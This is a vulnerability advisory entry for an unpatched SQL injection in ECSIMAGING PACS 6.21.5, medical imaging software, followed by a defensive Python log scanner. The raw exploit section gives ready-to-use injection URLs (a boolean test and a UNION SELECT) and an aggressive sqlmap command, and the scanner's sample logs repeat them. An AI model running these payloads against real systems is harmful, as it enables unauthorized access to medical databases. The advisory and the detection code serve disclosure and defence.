Vendor: PACS
By: shoxxdj
CVSS: 7.5 (HIGH)
CWE: 89 (SQL injection)
Product Name: PACS
Affected Version From: 6.21.5
Affected Version To: 6.21.5 and below
Patch Exists: NO
Related CWE:
CPE: a:ecs_imaging:pacs:6.21.5
Metasploit:
Other Scripts:
Platforms Tested: Linux
2021

ECSIMAGING PACS 6.21.5 – SQL injection

The parameter 'email' in ECSIMAGING PACS Application 6.21.5 and below is vulnerable to SQL injection. The 'selected_db' parameter can be leaked in the parameters.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL injection attacks. Additionally, the application should be kept up to date with the latest patches and security updates.

Exploit-DB raw data:

# Exploit Title: ECSIMAGING PACS 6.21.5 - SQL injection
# Date: 06/01/2021
# Exploit Author: shoxxdj
# Vendor Homepage: https://www.medicalexpo.fr/
# Version: 6.21.5 and below (tested on 6.21.5, 6.21.3)
# Tested on: Linux

ECSIMAGING PACS Application 6.21.5 and below suffers from an SQL injection vulnerability.
The parameter email is sensitive to SQL injection (selected_db can be leaked in the parameters).

Payload example : /req_password_user.php?email=test@test.com' OR NOT 9856=9856-- nBwf&selected_db=xtp001
/req_password_user.php?email=test@test.com'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&selected_db=xtp001

SQLMAP :  sqlmap.py -u '<URL>/req_password_user.php?email=test@test.com&selected_db=xtp001' --risk=3 --level=5
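
Since the entry lists no patch, reviewing web server logs for requests of the shape shown above is a practical check. The following is an added example, not part of the original advisory or the vendor's code: it scans access-log lines for requests to req_password_user.php whose email or selected_db value is not a plain address or identifier. The combined log format, the regular expressions and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Conservative shapes of legitimate values; anything else is reported.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
DB_RE = re.compile(r"[A-Za-z0-9_]+")
# Tokens used only to label a finding as a likely injection attempt.
SQLI_RE = re.compile(r"'|--|/\*|;|\b(?:union|select)\b", re.I)

def inspect_line(line):
    """Return findings for one log line (empty if clean or unrelated)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    if not target.path.endswith("/req_password_user.php"):
        return []
    # parse_qs percent-decodes values and turns '+' into a space.
    params = parse_qs(target.query, keep_blank_values=True)
    findings = []
    for value in params.get("email", []):
        if not EMAIL_RE.fullmatch(value):
            kind = "sqli-pattern" if SQLI_RE.search(value) else "malformed"
            findings.append(("email", kind, value))
    for value in params.get("selected_db", []):
        if not DB_RE.fullmatch(value):
            findings.append(("selected_db", "malformed", value))
    return findings

def scan(lines):
    """Return {line_number: findings} for every line that has findings."""
    return {n: f for n, line in enumerate(lines, 1) if (f := inspect_line(line))}

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Jan/2021:10:00:01 +0000] "GET /req_password_user.php?email=user%40example.org&selected_db=xtp001 HTTP/1.1" 200 512',
    '198.51.100.7 - - [06/Jan/2021:10:02:13 +0000] "GET /req_password_user.php?email=test@test.com%27%20OR%20NOT%209856=9856--%20nBwf&selected_db=xtp001 HTTP/1.1" 200 512',
    '198.51.100.7 - - [06/Jan/2021:10:02:15 +0000] "GET /req_password_user.php?email=test@test.com%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&selected_db=xtp001 HTTP/1.1" 200 498',
    '192.0.2.10 - - [06/Jan/2021:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for n, findings in scan(SAMPLE_LOG).items():
        for param, kind, value in findings:
            print(f"line {n}: {param} {kind}: {value!r}")
```

The same shape checks (a strict email pattern and an identifier-only selected_db) are the input validation the mitigation section calls for; on the server they belong in front of a parameterized query, not in place of one.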